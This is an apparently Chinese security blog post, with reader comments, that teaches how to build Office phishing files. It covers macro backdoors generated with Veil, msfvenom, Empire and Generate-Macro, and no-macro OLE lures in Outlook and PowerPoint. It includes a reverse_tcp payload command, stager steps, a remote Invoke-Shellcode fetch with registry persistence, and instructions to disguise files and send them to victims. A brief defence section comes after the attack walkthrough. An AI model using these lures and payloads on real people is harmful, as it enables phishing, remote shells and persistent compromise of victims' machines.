Office Phishing

Evi1cg 2016-03-03 10:30:00

Office作为Windows平台下一种非常流行的办公软件,越来越多的APT攻击通过构造恶意Office文件来进行实施,这也是成功率也是比较高的一种攻击方式。当然最隐蔽,最有效的攻击方式就是通过Office办公套件的一些0day来实施攻击,但是这也同样存在一些弊端,首先不是所有人都拥有0day,其次那些已经公布的Xday可能只能针对某些固定版本的Office,所以本文重点不在如果使用Xday,而是对现在已知的一些构造Office Phishing File的方式及方法进行总结,希望对学习Hack的同学有所帮助,当然也希望,通过此文,小伙伴能避免遭受此类攻击。

以下测试均在安装某安全卫士的Win10上面进行。

0x00 Office 宏


宏是微软公司为其OFFICE软件包设计的一个特殊功能,软件设计者为了让人们在使用软件进行工作时,避免一再地重复相同的动作而设计出来的一种工具,它利用简单的语法,把常用的动作写成宏,当在工作时,就可以直接利用事先编好的宏自动运行,去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。但是宏在提供方便的同时,也存在很大的风险,其危害在Freebuf上也有过相关文章:《MWI-5:利用Office宏下载键盘记录器的攻击活动分析》,下文将会介绍几个知名工具构造宏后门的方式。

1、 Veil

测试使用powershell/shellcode_inject/virtual,选择以后直接generate

随便输入一个名字之后成功生成:

然后需要下载一个转换脚本:

☁  office  git clone https://github.com/khr0x40sh/MacroShop.git

使用下载的python脚本转换为VBA脚本:

root@kali:~/script/MacroShop# python macro_safe.py /usr/share/veil-output/source/test.bat

之后将生成的内容添加到OFFice文件宏里面。创建宏,注意选择宏的位置为当前文档:

接下来选择Project 下面的Microsoft Word对象,选择Document->open,然后将生成的代码粘进去。要保存的代码如下图

这里注意一点,脚本生成的默认是打开表格的宏,所以,这里只要函数内容,注意打钩的。

之后保存为启用宏的Word文档或者doc文档。

开启监听:

root@kali:~/Veil-Evasion# msfconsole -r /usr/share/veil-output/handlers/test_handler.rc

打开word文档会有此提示:

点击启用,则生成meterpreter会话。

2、 Nishang

nishang的使用早在《使用powershell Client进行有效钓鱼》有所介绍,有兴趣的小伙伴可以再去看看。

3、 Metasploit

作为一个神器,Msf当然也可以生成VBA的后门文件,具体命令如下:

☁  ~  msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.100 lport=8888 -e x86/shikata_ga_nai exitfunc=thread -f vba > vcode.txt

4、 Empire

(Empire) > listeners
[!] No listeners currently active 
(Empire: listeners) > execute
(Empire: listeners) > usestager macro
(Empire: stager/macro) > set Listener test
(Empire: stager/macro) > set OutFile /tmp/macro.txt
(Empire: stager/macro) > execute

[*] Stager output written out to: /tmp/macro.txt

将代码写入宏,执行可成功返回会话:

5、 Scripts

☁  office  git clone https://github.com/enigma0x3/Generate-Macro.git

使用方式如下:

PS C:\Users\Evi1cg\Desktop> . .\Generate-Macro.ps1
Enter URL of Invoke-Shellcode script (If you use GitHub, use the raw version): https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-Shellcode.ps1
Enter IP Address: 192.168.2.111
Enter Port Number: 6666
Enter the name of the document (Do not include a file extension): Macro

--------Select Attack---------
1. Meterpreter Shell with Logon Persistence
2. Meterpreter Shell with Powershell Profile Persistence (Requires user to be local admin)
3. Meterpreter Shell with Alternate Data Stream Persistence
4. Meterpreter Shell with Scheduled Task Persistence
------------------------------
Select Attack Number & Press Enter: 1

--------Select Payload---------
1. Meterpreter Reverse HTTPS
2. Meterpreter Reverse HTTP
------------------------------
Select Payload Number & Press Enter: 2
Saved to file C:\Users\Evi1cg\Desktop\Macro.xls
Clean-up Script located at C:\Users\Evi1cg\Desktop\RegistryCleanup.ps1

运行Excel以后则生成meterpreter会话:

同时生成自启动后门:

具体键值为HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load

清除后门可以使用如下命令:

PS C:\Users\Evi1cg\Desktop> . .\RegistryCleanup.ps1
[*]Successfully Removed config.vbs from C:\Users\Public
[*]Successfully Removed Malicious Load entry from HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
[!]Path not valid
[!]Path not valid

具体其他后门的使用,有兴趣的小伙伴可是自己实践一下。

其他Macro后门相关的脚本如下:

0x01 Office OLE


OLE是Object Linking and Embedding的缩写,即“对象链接与嵌入”,这是一种把一个文件的一部分嵌入到另一个文件之中的技术,此类攻击方式也被常常应用于APT中,其有一个好处就是不需要用户开启宏,及在禁用宏的情况下执行命令。

1、 Outlook OLE

@三好学生 之前在Zone里面曾经有一个介绍:Outlook OLE 钓鱼邮件利用介绍,本人在win10+offcie2016下作了测试,在这里做一下简单的介绍,制作此钓鱼文件步骤如下:

  1. 新建邮件,在设置文本格式处选择RTF:

  2. 选择插入->对象->Package,选择显示为图标:

  3. 然后将图标换为Word图标,并修改题注为迷惑性名称:

  4. 绑定指定程序或脚本;

  5. 将RTF再改为HTML ;

  6. 添加其他迷惑内容 :

  7. 保存为test.msg ;

  8. 发送给受害者。

受害者运行以后会有以下提示:

点击是以后会弹:

点击打开,成功执行:

2、 PowerPoint OLE

通过PowerPoint演示文稿进行Phishing,同样不需要启用宏,制作步骤如下:

  1. 创建新的PowerPoint文件;
  2. 创建VBS脚本,为了简单演示,只写了一个弹框:

    ```
    Msgbox("test")

    ```
    3. 将VBS拖入PPT;

  3. 为VBS添加动画->OLE操作动作并选择激活,如下图:

  4. 选择动画窗格->效果选项:

  5. 选择计时->与上一动画同时:

  6. 为PPT添加内容;

  7. 另存为放映文件pps或者ppsx;

  8. 发送给受害者。

受害者打开会弹出如下提示框:

点击打开,执行脚本。

对于VBS后门,本文就不再详细描述怎么制作了,很多姿势小伙伴们可以自己搜集一下,比较好玩儿的请参考:JavaScript Phishing

对于VBS脚本可以使用这个脚本来进行加密:ncode-and-Decode-a-VB

0x02 防御


关于通过Office宏或者OLE对象进行的攻击从90年代开始了,然而现在还在利用中,如何更好地防御此类攻击呢?

  1. 你可以教育你的员工不要点启用宏,不要随便乱点确定,不要随便下载不明文件等。
  2. 配置组策略,如果在域下,可以批量配置管理模板。

    设置 Disable all except digitally signed macros:

    更多细节请看这里

  3. 对于.msg、.rtf、.pps 后缀的文件要格外注意;

  4. 采用EMET,如果你不知道EMET是什么,可以看这里

以上方法来自于it-s-time-to-secure-microsoft-office,关于规划Office的VBA宏的安全设置请看这里

0x03 小结


使用Office进行APT攻击的情形越来越多,在没有0day的情况下,我们应该至少对于以上类型的钓鱼攻击进行了解及防范,以上为个人所了解的几种构造Office钓鱼文件的方式,可能并不全面,如果小伙伴还有别的姿势,请不吝赐教。

0x04 参考


本文由evi1cg原创并首发于乌云drops,转载请注明

评论

S

Security 2016-03-03 11:16:51

修改注册表,360没拦截?

E

Evi1cg 2016-03-03 12:42:50

@Security 不好意思,文章没写严谨,对注册表的操作360是会拦截的,除了Generate-Macro留后门的操作之外的其他测试,目前360是没有任何拦截的。

Hxai11 2016-03-03 15:00:01

很想知道这个年代宏这类的利用率还有多大。。

路人甲 2016-03-03 15:55:37

感谢分享,学习了

路人甲 2016-03-03 17:50:57

0day
:)
Microsoft office<2013 Remote Command Execution
Email:[email protected]/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */

X

Xc0d3r 2016-03-10 01:49:09

好文!

E

Evi1cg

喵喵汪~

twitter weibo github wechat

随机分类

木马与病毒 文章:125 篇
数据分析与机器学习 文章:12 篇
安全开发 文章:83 篇
二进制安全 文章:77 篇
Python安全 文章:13 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Article_kelp

因为这里的静态目录访功能应该理解为绑定在static路径下的内置路由,你需要用s

N

Nas

师傅您好!_static_url_path那 flag在当前目录下 通过原型链污

Z

zhangy

你好,为什么我也是用windows2016和win10,但是流量是smb3,加密

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

Yukong

🐮皮

目录